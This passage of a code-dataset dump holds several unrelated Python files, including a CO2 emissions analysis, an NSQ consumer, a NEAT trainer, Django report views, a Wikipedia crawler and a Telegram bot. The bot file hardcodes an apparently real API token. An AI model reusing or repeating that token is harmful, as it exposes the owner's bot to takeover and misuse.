36))\r\nax.show()\r\n\r\n\r\n\r\n\r\n\r\ndata.show()\r\n\r\nno_years = data.groupby('code')['year_data'].count().rename('count').reset_index()\r\nmax_pop = data.groupby('code')['pop'].max().reset_index()\r\n\r\npop_years = pd.merge(no_years, max_pop)\r\npop_years['pop'].sum() # 7_248_361_589\r\npop_years[pop_years['count'] < 26]['pop'].sum() # 139_046_348\r\npop_years[pop_years['count'] == 26]['pop'].sum() # 7_109_315_241\r\n\r\npop_years[pop_years['count'] == 23]['pop']\r\ncountries.dtypes\r\n\r\ncountries = pd.merge(countries, pop_years)\r\n\r\ncountries.final_region.drop_duplicates()\r\n\r\ndata\r\n\r\nregions = pd.merge(data, countries[countries['count'] == 26][['code', 'final_region']])\r\n# regions.final_region.drop_duplicates()\r\nregions.loc[regions.final_region == 'Evropská unie', 'final_region'] = 'Evropa'\r\nregions.loc[regions.final_region == 'Spojené státy americké', 'final_region'] = 'Severní Amerika'\r\nworld = regions.drop(columns=['code', 'final_region']).groupby(['year_data']).sum().reset_index()\r\n\r\ncze = regions[regions.code == 'CZE'].copy()\r\ncze['final_region'] = 'Česká republika'\r\nregions = pd.concat([regions, cze])\r\nregions = regions.drop(columns=['code']).groupby(['final_region', 'year_data']).sum().reset_index()\r\n# regions.show()\r\n\r\nregions['ghg_per_cap'] = 1_000 * regions['co2eq'] / regions['pop'] # t CO2eq / capita\r\nregions['ghg_per_gdp'] = 1_000_000 * regions['co2eq'] / regions['gdp_ppp'] # kg CO2eq / $\r\nregions['gdp_per_cap'] = regions['gdp_ppp'] / regions['pop']\r\nregions['co2eq'] = regions['co2eq'] / 1_000_000 # Gt CO2\r\nregions['gdp_ppp'] = regions['gdp_ppp'] / 1_000_000 # Gt CO2\r\nregions['pop'] = regions['pop'] / 1_000_000_000 # Gt CO2\r\n\r\nworld['ghg_per_cap'] = 1_000 * world['co2eq'] / world['pop'] # t CO2eq / capita\r\nworld['ghg_per_gdp'] = 1_000_000 * world['co2eq'] / world['gdp_ppp'] # kg CO2eq / $\r\nworld['gdp_per_cap'] = world['gdp_ppp'] / world['pop']\r\nworld['co2eq'] = world['co2eq'] / 1_000_000 # Gt CO2\r\nworld['gdp_ppp'] = world['gdp_ppp'] / 1_000_000 # Gt CO2\r\nworld['pop'] = world['pop'] / 1_000_000_000 # Gt CO2\r\nworld['final_region'] = 'Svět'\r\n\r\n\r\ntitles = {\r\n 'ghg_per_cap': 't CO2eq / person',\r\n 'ghg_per_gdp': 'kg CO2eq / $',\r\n 'gdp_per_cap': '$ / person',\r\n 'pop': 'population (billion)',\r\n 'gdp_ppp': 'GDP (million $)',\r\n 'co2eq': 'Gt CO2eq'\r\n}\r\n\r\nplt.rcParams['figure.figsize'] = 12, 7\r\n\r\nfigs = []\r\nfor x in ['ghg_per_cap', 'ghg_per_gdp', 'gdp_per_cap', 'pop', 'gdp_ppp', 'co2eq']:\r\n fig, ax = plt.subplots()\r\n sns.lineplot('year_data', x, data=regions, hue='final_region', marker='o')\r\n ax.set_title(titles[x] + ' (regions)')\r\n legend = plt.legend()\r\n legend.get_frame().set_facecolor('none')\r\n figs.append(fig)\r\n\r\n# Chart(figs, cols=2, title='All regions').show()\r\nall_chart = Chart(figs, cols=2, title='All regions')\r\n\r\n\r\nplt.rcParams['figure.figsize'] = 8, 5\r\nfigs = []\r\nfor x in ['ghg_per_cap', 'ghg_per_gdp', 'gdp_per_cap', 'pop', 'gdp_ppp', 'co2eq']:\r\n fig, ax = plt.subplots()\r\n sns.lineplot('year_data', x, data=world, marker='o')\r\n ax.set_title(titles[x] + ' (world)')\r\n figs.append(fig)\r\n\r\n# Chart(figs, cols=3, title='World').show()\r\nworld_chart = Chart(figs, cols=3, title='World')\r\n\r\n\r\nplt.rcParams['figure.figsize'] = 8, 5\r\ncharts = []\r\nfor r, rdf in regions.groupby('final_region'):\r\n figs = []\r\n for x in ['ghg_per_cap', 'ghg_per_gdp', 'gdp_per_cap', 'pop', 'gdp_ppp', 'co2eq']:\r\n fig, ax = plt.subplots()\r\n sns.lineplot('year_data', x, data=rdf, marker='o')\r\n ax.set_title(titles[x] + f' ({r})')\r\n figs.append(fig)\r\n charts.append(Chart(figs, cols=3, title=r))\r\n\r\nregions_chart = Selector(charts, title='Per region')\r\nf# regions_chart.show()\r\n\r\nrep = Selector([all_chart, world_chart, regions_chart], 'Emissions intensity (2015 update)')\r\nrep.show()\r\n\r\n\r\n# again, CO2 to 2018 only! ---\r\n\r\ndata = df[['code', 'year', 'SP.POP.TOTL', 'NY.GDP.MKTP.PP.KD', 'edgar50_co2']] \\\r\n .rename(columns={'year': 'year_data', 'SP.POP.TOTL': 'pop', 'NY.GDP.MKTP.PP.KD': 'gdp_ppp',\r\n 'edgar50_co2': 'co2'})\r\n\r\nvars = ['pop', 'gdp_ppp', 'co2']\r\ndata = data.dropna(subset=vars)\r\n\r\ndata['year_data'] = np.int_(data['year_data'])\r\ncountries = pd.read_csv('D:\\\\projects\\\\fakta-o-klimatu\\\\work\\\\emission-intensity\\\\countries.csv')\r\n\r\nno_years = data.groupby('code')['year_data'].count().rename('count').reset_index()\r\nmax_pop = data.groupby('code')['pop'].max().reset_index()\r\n\r\npop_years = pd.merge(no_years, max_pop)\r\npop_years['pop'].sum() # 7_502_176_200\r\npop_years[pop_years['count'] < 29]['pop'].sum() # 225_276_087\r\npop_years[pop_years['count'] == 29]['pop'].sum() # 7_276_900_113\r\n\r\ncountries = pd.merge(countries, pop_years)\r\n\r\nregions = pd.merge(data, countries[countries['count'] == 29][['code', 'final_region']])\r\n# regions.final_region.drop_duplicates()\r\nregions.loc[regions.final_region == 'Evropská unie', 'final_region'] = 'Evropa'\r\nregions.loc[regions.final_region == 'Spojené státy americké', 'final_region'] = 'Severní Amerika'\r\nworld = regions.drop(columns=['code', 'final_region']).groupby(['year_data']).sum().reset_index()\r\n\r\ncze = regions[regions.code == 'CZE'].copy()\r\ncze['final_region'] = 'Česká republika'\r\nregions = pd.concat([regions, cze])\r\nregions = regions.drop(columns=['code']).groupby(['final_region', 'year_data']).sum().reset_index()\r\n# regions.show()\r\n\r\nregions['ghg_per_cap'] = 1_000 * regions['co2'] / regions['pop'] # t CO2 / capita\r\nregions['ghg_per_gdp'] = 1_000_000 * regions['co2'] / regions['gdp_ppp'] # kg CO2 / $\r\nregions['gdp_per_cap'] = regions['gdp_ppp'] / regions['pop']\r\nregions['co2'] = regions['co2'] / 1_000_000 # Gt CO2\r\nregions['gdp_ppp'] = regions['gdp_ppp'] / 1_000_000\r\nregions['pop'] = regions['pop'] / 1_000_000_000\r\n\r\nworld['ghg_per_cap'] = 1_000 * world['co2'] / world['pop'] # t CO2eq / capita\r\nworld['ghg_per_gdp'] = 1_000_000 * world['co2'] / world['gdp_ppp'] # kg CO2eq / $\r\nworld['gdp_per_cap'] = world['gdp_ppp'] / world['pop']\r\nworld['co2'] = world['co2'] / 1_000_000 # Gt CO2\r\nworld['gdp_ppp'] = world['gdp_ppp'] / 1_000_000 # Gt CO2\r\nworld['pop'] = world['pop'] / 1_000_000_000 # Gt CO2\r\nworld['final_region'] = 'Svět'\r\n\r\n\r\ntitles = {\r\n 'ghg_per_cap': 't CO2 / person',\r\n 'ghg_per_gdp': 'kg CO2 / $',\r\n 'gdp_per_cap': '$ / person',\r\n 'pop': 'population (billion)',\r\n 'gdp_ppp': 'GDP (million $)',\r\n 'co2': 'Gt CO2'\r\n}\r\n\r\nplt.rcParams['figure.figsize'] = 12, 7\r\n\r\nfigs = []\r\nfor x in ['ghg_per_cap', 'ghg_per_gdp', 'gdp_per_cap', 'pop', 'gdp_ppp', 'co2']:\r\n fig, ax = plt.subplots()\r\n sns.lineplot('year_data', x, data=regions, hue='final_region', marker='o')\r\n ax.set_title(titles[x] + ' (regions)')\r\n legend = plt.legend()\r\n legend.get_frame().set_facecolor('none')\r\n figs.append(fig)\r\n\r\n# Chart(figs, cols=2, title='All regions').show()\r\nall_chart = Chart(figs, cols=2, title='All regions')\r\n\r\n\r\nplt.rcParams['figure.figsize'] = 8, 5\r\nfigs = []\r\nfor x in ['ghg_per_cap', 'ghg_per_gdp', 'gdp_per_cap', 'pop', 'gdp_ppp', 'co2']:\r\n fig, ax = plt.subplots()\r\n sns.lineplot('year_data', x, data=world, marker='o')\r\n ax.set_title(titles[x] + ' (world)')\r\n figs.append(fig)\r\n\r\n# Chart(figs, cols=3, title='World').show()\r\nworld_chart = Chart(figs, cols=3, title='World')\r\n\r\n\r\nplt.rcParams['figure.figsize'] = 8, 5\r\ncharts = []\r\nfor r, rdf in regions.groupby('final_region'):\r\n figs = []\r\n for x in ['ghg_per_cap', 'ghg_per_gdp', 'gdp_per_cap', 'pop', 'gdp_ppp', 'co2']:\r\n fig, ax = plt.subplots()\r\n sns.lineplot('year_data', x, data=rdf, marker='o')\r\n ax.set_title(titles[x] + f' ({r})')\r\n figs.append(fig)\r\n charts.append(Chart(figs, cols=3, title=r))\r\n\r\nregions_chart = Selector(charts, title='Per region')\r\n# regions_chart.show()\r\n\r\nrep = Selector([all_chart, world_chart, regions_chart], 'Emissions intensity (CO2 only, 2018 update)')\r\nrep.show()\r\n\r\n\r\n\r\n\r\n","repo_name":"protivinsky/python-utils","sub_path":"scripts/2020-02-25_co2-vs-gdp-edgar5.py","file_name":"2020-02-25_co2-vs-gdp-edgar5.py","file_ext":"py","file_size_in_byte":17416,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"73819079201","text":"import gnsq\nimport rdtscp_module\nimport numpy as np\nimport sys\n\n# Variable Initialization\nglobal true_flows\nglobal predicted_flows\nglobal latencies\nglobal messages_processed\n\ntrue_flows = []\npredicted_flows = []\nlatencies = []\nmessages_processed = 0\n\n# NSQ Setup\ntopic = 'nsq-spark-out'\nchannel = 'asdf'\naddress = '192.168.0.120'\nport = '4150'\nreader = gnsq.Reader(topic, channel, address+':'+port, max_in_flight=1000, lookupd_poll_interval=1)\n\n# Experimental values\nburst_size = 200\nmax_received = 20000\n\n@reader.on_message.connect\ndef handler(reader, message):\n # Timestamp right away\n curr_ns = rdtscp_module.rdtscp()\n\n global true_flows\n global predicted_flows\n global latencies\n global messages_processed\n\n data = message.body.decode(\"utf-8\").split(\";\")\n \n predicted_flows.append(data[0])\n true_flows.append(data[1])\n old_ns = int(float(data[2]))\n\n latency = curr_ns - old_ns\n latencies.append(latency)\n\n messages_processed += 1\n\n if messages_processed % burst_size == 0:\n print(messages_processed)\n\n if messages_processed % max_received == 0:\n np.savetxt('latency.txt', np.asarray(latencies), fmt='%d')\n sys.exit(0)\n\nreader.start()\n","repo_name":"BenjaminBush/research","sub_path":"nsq_scripts/consume.py","file_name":"consume.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"11448323971","text":"\"\"\"Training script for parallelized NEAT on the basic ruleset.\"\"\"\n\nimport multiprocessing\nimport os\nimport pickle\nfrom typing import Optional\n\nimport neat\n\nfrom basic_neat_model.parallel_utils import evaluate\nfrom basic_neat_model.parallel_utils import ParallelSelfPlayEvaluator\n\n\ndef train(config_file: str,\n generations: Optional[int] = 300,\n checkpoint_file: Optional[str] = None):\n \"\"\"Trains a network using the given configuration. Saves the winner.\n\n Args:\n config_file: Path to the configuration from this file's directory.\n generations: The number of generations to train for.\n checkpoint_file: Path to a checkpoint from this file's directory.\n \"\"\"\n config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction,\n neat.DefaultSpeciesSet, neat.DefaultStagnation,\n config_file)\n\n if checkpoint_file is not None:\n pop = neat.Checkpointer.restore_checkpoint(checkpoint_file)\n else:\n pop = neat.Population(config)\n\n pop.add_reporter(neat.StdOutReporter(True))\n stats = neat.StatisticsReporter()\n pop.add_reporter(stats)\n pop.add_reporter(\n neat.Checkpointer(generation_interval=1,\n filename_prefix=\"checkpoints/neat-checkpoint-\"))\n pe = ParallelSelfPlayEvaluator(multiprocessing.cpu_count() - 1, evaluate)\n\n winner = pop.run(pe.evaluate, generations)\n\n with open(\"winner.p\", \"wb\") as file:\n pickle.dump(winner, file)\n\n print(f\"\\nBest genome:\\n{winner}\")\n\n\ndef load_winner(winner_file: str) -> neat.DefaultGenome:\n with open(winner_file, \"rb\") as file:\n winner = pickle.load(file)\n return winner\n\n\nif __name__ == \"__main__\":\n local_dir = os.path.dirname(__file__)\n config_path = os.path.join(local_dir, \"config\")\n train(config_path)\n","repo_name":"ADSteele916/project-lance","sub_path":"basic_neat_model/parallel_model.py","file_name":"parallel_model.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2497857385","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load in \nimport time\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\n# Input data files are available in the \"../input/\" directory.\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\nfrom subprocess import check_output\nprint(check_output([\"ls\", \"../input\"]).decode(\"utf8\"))\n\nt0 = time.time()\ntrain = pd.read_csv('../input/clicks_train.csv',usecols=['ad_id','clicked'])\n\nprint ('1: ' + str(time.time()-t0))\nt0 = time.time()\n\n\ntest = pd.read_csv('../input/clicks_test.csv')\n\nprint ('2: ' + str(time.time()-t0))\nt0 = time.time()\n\nad_likelihood = train.groupby('ad_id')['clicked'].agg(['count','sum','mean']).reset_index()\n\nprint ('3: ' + str(time.time()-t0))\nt0 = time.time()\n\nmean_clicked = train.clicked.mean()\n\nprint ('4: ' + str(time.time()-t0))\nt0 = time.time()\n\ndel train\nww = 0\nad_likelihood['likelihood'] = (ad_likelihood['sum'] + ww * mean_clicked) / (ad_likelihood['count'] + ww)\n\nprint ('5: ' + str(time.time()-t0))\nt0 = time.time()\n\ntest = test.merge(ad_likelihood,how='left')\n\nprint ('6: ' + str(time.time()-t0))\nt0 = time.time()\n\ntest.fillna(mean_clicked,inplace=True)\n\nprint ('7: ' + str(time.time()-t0))\nt0 = time.time()\n\n\ntest.sort_values(['display_id','likelihood'],inplace=True,ascending=False)\n\nprint ('8: ' + str(time.time()-t0))\nt0 = time.time()\n\noutput=test.groupby(['display_id'])['ad_id'].apply(lambda x:' '.join(map(str,x))).reset_index()\n\nprint ('9: ' + str(time.time()-t0))\nt0 = time.time()\n\noutput.to_csv('output.csv',index=False)\n\nprint ('10: ' + str(time.time()-t0))\nt0 = time.time()","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/outbrain-click-prediction/Behjat/pandas-lb-0-63709.py","file_name":"pandas-lb-0-63709.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"2178659356","text":"from django.shortcuts import render\nfrom .models import EduLevelProgram, Program, DevelopeForm, PriemType, GoogleReport, Status, ExamesTite\nfrom django.http import JsonResponse\nfrom .tasks import make_report_xlsx, make_report_google, register_entrant, write_exames, make_mail_exam\n\nfrom django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\n\n# Create your views here.\nfrom django.views.generic import View\nfrom django.core.paginator import Paginator\n\nfrom .google import GoogleConnection, DeleteData\n\n\n\nclass Report(View):\n template_name = 'oopk/report.html'\n\n def __init__(self, **kwargs) -> None:\n super().__init__(**kwargs)\n self.data = {\n \"success\": True,\n \"errors\": None\n }\n\n self.postData = {}\n \n def get(self, request, *args, **kwargs):\n \n eduLevel = EduLevelProgram.objects.all().order_by(\"name\")\n program = Program.objects.all().order_by(\"code\")\n form = DevelopeForm.objects.all().order_by(\"sort\")\n finance = PriemType.objects.all().order_by(\"name\")\n status = Status.objects.all().order_by(\"name\")\n \n context = {}\n\n context['eduLevel'] = eduLevel\n context['programs'] = program\n context['forms'] = form\n context['typePriem'] = finance\n context['status'] = status\n\n return render(request, self.template_name, context)\n \n def post(self, request, *args, **kwargs):\n \n if request.META.get('HTTP_X_REQUESTED_WITH') == 'XMLHttpRequest':\n\n self.postData = request.POST.dict()\n \n self.postData.update({\"program\":request.POST.getlist(\"program\")})\n self.postData.update({\"form\":request.POST.getlist(\"form\")})\n self.postData.update({\"competitionType\":request.POST.getlist(\"competitionType\")})\n self.postData.update({\"abiturstatus\":request.POST.getlist(\"abiturstatus\")})\n self.postData.update({\"user\":request.user.id})\n \n\n \n if self.postData.get(\"radioReportType\") == \"google\":\n task = make_report_google.delay(self.postData)\n operation_type = \"google\"\n else:\n \n task = make_report_xlsx.delay(self.postData)\n operation_type = \"xlsx\"\n \n \n return JsonResponse({'task_id': task.id, \"operation_type\": operation_type})\n \n\n \n@csrf_exempt\ndef download_report_view(request):\n\n if request.method == 'POST' and request.META.get('HTTP_X_REQUESTED_WITH') == 'XMLHttpRequest':\n \n task_id = request.POST.get('task_id')\n \n\n if request.POST.get(\"operation_type\") == \"xlsx\":\n result = make_report_xlsx.AsyncResult(task_id)\n else:\n result = make_report_google.AsyncResult(task_id)\n\n if result.ready():\n\n result = result.result\n \n if request.POST.get(\"operation_type\") == \"xlsx\":\n \n return JsonResponse({'status': 'SUCCESS', 'file': result, 'file_name': 'report.xlsx'})\n else:\n if result[\"error\"]:\n pass\n else:\n return JsonResponse({'status': 'SUCCESS', 'url': result[\"url\"]})\n else:\n \n return JsonResponse({'status': 'in_progress'})\n else:\n \n return HttpResponse(\"Error: Invalid request method.\")\n\n\n#фильтр для формы запросов\nclass MyAjaxFilterView(View):\n\n def get(self, request, *args, **kwargs):\n\n if request.META.get('HTTP_X_REQUESTED_WITH') == 'XMLHttpRequest':\n # Получение значений выбранных полей формы\n filter_value = request.GET.get('filter_field1')\n \n # Фильтрация данных на основе значений выбранных полей\n filtered_data = Program.objects.filter(eduLevel__name = filter_value)\n # Пример формирования данных для отправки в JSON-формате\n data = {'filtered_data': list(filtered_data.values())}\n\n return JsonResponse(data)\n \n#Вывод данных в отчетную таблицу\nclass ReportTable(View):\n\n template_name = 'oopk/report_table.html'\n\n\n def get(self, request, *args, **kwargs):\n\n report = GoogleReport.objects.select_related(\"user\").order_by(\"-created_time\")\n\n paginator = Paginator(report, 10) # 10 элементов на страницу\n page = request.GET.get('page')\n items = paginator.get_page(page)\n\n context = {}\n\n context['reports'] = items\n\n\n return render(request, self.template_name, context)\n\n#Удаление отчета google\n@csrf_exempt\ndef delete_sheet_view(request):\n\n \n result = {\"success\": True, \"error\": None}\n\n if request.method == 'POST' and request.META.get('HTTP_X_REQUESTED_WITH') == 'XMLHttpRequest':\n\n \n services = GoogleConnection(request.user.pk).build_services()\n \n if services[\"error\"]:\n result.update({\"success\": False,\"error\": services[\"error\"]})\n\n spreadsheet_id = GoogleReport.objects.get(pk = request.POST.get(\"itemId\")).spreadsheet_id\n \n\n delete_result = DeleteData(drive_service = services[\"drive_service\"], spreadsheet_id=spreadsheet_id).delete()\n GoogleReport.objects.get(pk = request.POST.get(\"itemId\")).delete()\n\n \n return JsonResponse(result)\n\n#------------------------------------------\n#Exames\n\nclass ExamRegistration(View):\n template_name = 'oopk/exam_registration.html'\n\n def __init__(self, **kwargs) -> None:\n super().__init__(**kwargs)\n self.data = {\n \"success\": True,\n \"errors\": None\n }\n\n self.postData = {}\n \n def get(self, request, *args, **kwargs):\n \n\n return render(request, self.template_name) \n \n def post(self, request, *args, **kwargs):\n\n self.postData = request.POST.dict()\n\n task = register_entrant.delay(self.postData)\n \n return JsonResponse({'task_id': task.id})\n \n\n@csrf_exempt\ndef download_reg_file_view(request):\n\n if request.method == 'POST' and request.META.get('HTTP_X_REQUESTED_WITH') == 'XMLHttpRequest':\n \n task_id = request.POST.get('task_id')\n \n result = register_entrant.AsyncResult(task_id)\n \n if result.ready():\n\n result = result.result\n \n return JsonResponse({'status': 'SUCCESS', 'file': result[\"file\"], 'file_name': result[\"file_name\"], 'type': result[\"type\"] } )\n \n else:\n \n return JsonResponse({'status': 'in_progress'})\n else:\n \n return HttpResponse(\"Error: Invalid request method.\")\n\nclass ExamWrite(View):\n template_name = 'oopk/exam_write.html'\n\n def __init__(self, **kwargs) -> None:\n super().__init__(**kwargs)\n self.data = {\n \"success\": True,\n \"errors\": None\n }\n\n self.postData = {}\n \n def get(self, request, *args, **kwargs):\n\n eduLevel = ExamesTite.objects.select_related('edulevel').values_list('edulevel__name', flat=True).distinct()\n exames_title = ExamesTite.objects.values_list('name', flat=True).order_by(\"name\")\n \n \n context = {}\n\n context['eduLevel'] = eduLevel\n context[\"exames\"] = exames_title\n \n\n return render(request, self.template_name, context) \n \n def post(self, request, *args, **kwargs):\n\n self.postData = request.POST.dict()\n\n self.postData.update({\"exam\":request.POST.getlist(\"exam\")})\n\n task = write_exames.delay(self.postData)\n \n return JsonResponse({'task_id': task.id})\n \n\n#фильтр для записи экзаменов\nclass ExameAjaxFilterView(View):\n\n def get(self, request, *args, **kwargs):\n\n if request.META.get('HTTP_X_REQUESTED_WITH') == 'XMLHttpRequest':\n # Получение значений выбранных полей формы\n group = True if request.GET.get('group') == \"Да\" else False\n \n eduLevel = request.GET.get('eduLevel')\n \n # Фильтрация данных на основе значений выбранных полей\n filtered_data = ExamesTite.objects.select_related(\"edulevel\").filter(edulevel__name = eduLevel, group = group)\n \n # Пример формирования данных для отправки в JSON-формате\n data = {'filtered_data': list(filtered_data.values())}\n\n return JsonResponse(data)\n \n@csrf_exempt\ndef download_write_file_view(request):\n\n if request.method == 'POST' and request.META.get('HTTP_X_REQUESTED_WITH') == 'XMLHttpRequest':\n \n task_id = request.POST.get('task_id')\n \n result = write_exames.AsyncResult(task_id)\n \n if result.ready():\n\n result = result.result\n \n return JsonResponse({'status': 'SUCCESS', 'file': result[\"file\"], 'file_name': result[\"file_name\"], 'type': result[\"type\"] } )\n \n else:\n \n return JsonResponse({'status': 'in_progress'})\n else:\n \n return HttpResponse(\"Error: Invalid request method.\")\n\n\nclass ExamMail(View):\n template_name = 'oopk/exam_mail.html'\n\n def __init__(self, **kwargs) -> None:\n super().__init__(**kwargs)\n self.data = {\n \"success\": True,\n \"errors\": None\n }\n\n self.postData = {}\n \n def get(self, request, *args, **kwargs):\n \n\n return render(request, self.template_name) \n \n def post(self, request, *args, **kwargs):\n\n self.postData = request.POST.dict()\n\n task = make_mail_exam.delay(self.postData)\n \n return JsonResponse({'task_id': task.id})\n \n\n@csrf_exempt\ndef download_mail_file_view(request):\n\n if request.method == 'POST' and request.META.get('HTTP_X_REQUESTED_WITH') == 'XMLHttpRequest':\n \n task_id = request.POST.get('task_id')\n \n result = make_mail_exam.AsyncResult(task_id)\n \n if result.ready():\n\n result = result.result\n \n return JsonResponse({'status': 'SUCCESS', 'file': result[\"file\"], 'file_name': result[\"file_name\"], 'type': result[\"type\"] } )\n \n else:\n \n return JsonResponse({'status': 'in_progress'})\n else:\n \n return HttpResponse(\"Error: Invalid request method.\")","repo_name":"hyxp3r/paosystem_new","sub_path":"oopk/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16450142318","text":"from django.conf.urls import url\nfrom . import views\n\n\nurlpatterns = [\n url(r'^search/$', views.search, name='search'),\n url(r'^reservate/', views.reservate_calendar),\n url(r'^(?P<room_id>[0-9]+)/booking/(?P<book_id>[0-9]+)/delete/$', views.delete_calendar)\n]\n\n","repo_name":"mustakadem/project-2DAW","sub_path":"home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1944158605","text":"# 我想大部分人都知道,通常一个程序员会具有的美德。当然了,有三种:懒惰、暴躁、傲慢。\n# 一个人写的烂软件将会给另一个人带来一份全职工作。\n# 一鼓作气,考研是一种忍耐!!!\n'''\nread([size]):从文件中读取size个字节或字符的内容返回。若省略[size],则读取到文件末尾,即一次读取文件所有内容\nreadline():从文本文件中读取一行内容\nreadlines():把文本文件中每一行都作为独立的字符串对象,并将这些对象放入列表返国\nwrite(str):将字符串str内容写入文件\nwritelines(s_list):将字符串列表 s_list写入文本文件,不添加换行符\nseek(offset[,whence]):把文件指针移动到新的位置,offset表示相对于whence的位置:\n offset:为正,往结束方向移动;为负,往开始方向移动\n whence不同的值代表不同含义:\n 0:从文件头开始计算(默认值)\n 1:从当前位置开如计算\n 2:从文件尾开始计算\ntell():返回文件指针的当前位置\nflush():把缓冲区的内容写入文件,但不关闭文件\nclose():把缓冲区的内容写入文件,同时关闭文件,释放文件对象相关\n'''\n\n#读\nfile=open('c.txt','r')\nprint(file.read(2)) #读取两个字符,即“中国”\nprint(file.readline()) #从文本文件中读取一行内容\nprint(file.readlines()) #把文本文件中每一行都作为独立的字符串对象,并将这些对象放入列表返回\n\n#写\nfile=open('d.txt','a')\nfile.write('hello')\nlst=['java','go','c++','c']\nfile.writelines(lst)\nfile.close()\n\n\n#文件指针 -- seek\nfile=open('c.txt','r')\nfile.seek(2)#跳过2个字节,一个中文2个字节。跳过“中”,而从“国”开始走了\nprint(file.read())\nfile.close()\n\n\n#返回指针文件的当前位置 -- tell\nfile=open('d.txt','r')\nprint(file.read())\nprint(file.tell())\nfile.close()\n\n\n#把缓冲区的内容写入文件,但不关闭文件 -- flush\nfile=open('e.txt','a')\nfile.write('hello')\nfile.flush()\nfile.write('world')\nfile.close()","repo_name":"FelixG520/Python","sub_path":"python基础/15.第十五章(文件处理)/4.文件对象的常用方法/文件对象的常用方法.py","file_name":"文件对象的常用方法.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25422884799","text":"import bs4\nimport requests\nfrom download_pages import start_save_process, get_tags\nimport traceback\n\nroot_url = \"https://en.wikipedia.org/wiki/Category:Lists_of_people_in_STEM_fields\"\nbase_url = \"https://en.wikipedia.org\"\n\n# Might remove in favor having this redundancy filtering being done at download\nhave_visited = dict()\n\npages_to_ignore = []\n\nheadings_to_ignore = [\"Editing:\", \"Portal:\", \"Wikipedia:\", \"Talk:\", \"File:\", \"Template:\"]\n\n\ndef descend(page, level: int, is_redirect=False):\n try:\n if level >= 4:\n return\n if page is not None:\n heading = page.find(id=\"firstHeading\")\n heading_text = heading.text\n if heading_text in pages_to_ignore:\n return\n elif page in have_visited.keys():\n return\n elif [element for element in headings_to_ignore if (element in heading_text)]:\n return\n else:\n print(\"\\n|\", 2 * level * \"—\", heading_text, sep=\"\", end=\"\")\n if \"Category\" in heading_text:\n handle_category(page, level + 1)\n elif \"Lists of\" in heading_text and not is_redirect:\n handle_lists(page, level + 1)\n elif \"List of\" in heading_text and not is_redirect:\n handle_list(page, level + 1)\n else:\n handle_ambiguous_page(page, level + 1)\n\n except Exception as e:\n print(\"\")\n print(e)\n\n\ndef handle_ambiguous_page(page, level):\n biography_infobox = page.find(class_=\"infobox biography vcard\")\n\n if biography_infobox is not None or prob_is_a_person(page):\n have_visited[page] = True\n start_save_process(page)\n print(\": Saved\", end=\"\")\n return\n\n\ndef prob_is_a_person(page):\n tags = get_tags(page)\n str_tags = \" \".join(tags)\n personhood_markers = [\"living \", \" births\", \" deaths\"]\n for marker in personhood_markers:\n if marker in str_tags.lower():\n return True\n return False\n\n\ndef handle_category(page, level: int):\n sub_pages = page.find(id=\"mw-pages\")\n list_items = sub_pages.find_all(\"li\")\n for item in list_items:\n have_visited[page] = True\n link = item.find(\"a\")\n url = base_url + link[\"href\"]\n descend(get_bs4_page(url), level)\n\n\ndef handle_lists(page, level: int):\n content = page.find(class_=\"mw-parser-output\")\n list_items = content.find_all(\"li\")\n for list_item in list_items:\n have_visited[page] = True\n link = list_item.find(\"a\")\n url = base_url + link[\"href\"]\n descend(get_bs4_page(url), level)\n\n\ndef handle_list(page, level: int):\n content = page.find(class_=\"mw-parser-output\")\n if content is None:\n return\n link_to_pages = content.find_all(\"a\")\n for link in link_to_pages:\n href = link[\"href\"]\n is_redirect = False\n if link.has_attr(\"class\"):\n is_redirect = (\"mw-redirect\" in link[\"class\"])\n if (\"#\" not in href) and (link.text != \"link\") and (\"List of\" not in link.text) \\\n and (\"Lists of\" not in link.text) and (\"Category\" not in link.text):\n have_visited[page] = True\n descend(get_bs4_page(base_url + href), level, is_redirect)\n\n\ndef get_bs4_page(url: str):\n if \"/wiki/\" not in url:\n return None\n response = requests.get(url)\n return bs4.BeautifulSoup(response.text, \"html.parser\")\n\n\nif __name__ == '__main__':\n descend(get_bs4_page(root_url), 0)\n","repo_name":"Madrugaur/backbone","sub_path":"code/python/scripts/wiki_crawler.py","file_name":"wiki_crawler.py","file_ext":"py","file_size_in_byte":3523,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"26421251398","text":"import logging\r\nimport wikipedia\r\nfrom aiogram import Bot, Dispatcher, executor, types\r\n\r\nAPI_TOKEN = '5203534164:AAFHs3QkFr_szIXaeHe0PYKg-FtL5LwHYlY'\r\nwikipedia.set_lang('uz')\r\n# Configure logging\r\nlogging.basicConfig(level=logging.INFO)\r\n\r\n# Initialize bot and dispatcher\r\nbot = Bot(token=API_TOKEN)\r\ndp = Dispatcher(bot)\r\n\r\n@dp.message_handler(commands=['start'])\r\nasync def send_welcome(message: types.Message):\r\n \"\"\"\r\n This handler will be called when user sends `/start` or `/help` command\r\n \"\"\"\r\n await message.reply(\"Salom men wikipediadan maqolalarni topishda yordam beraman\")\r\n\r\n@dp.message_handler(commands=['help'])\r\nasync def send_welcome(message: 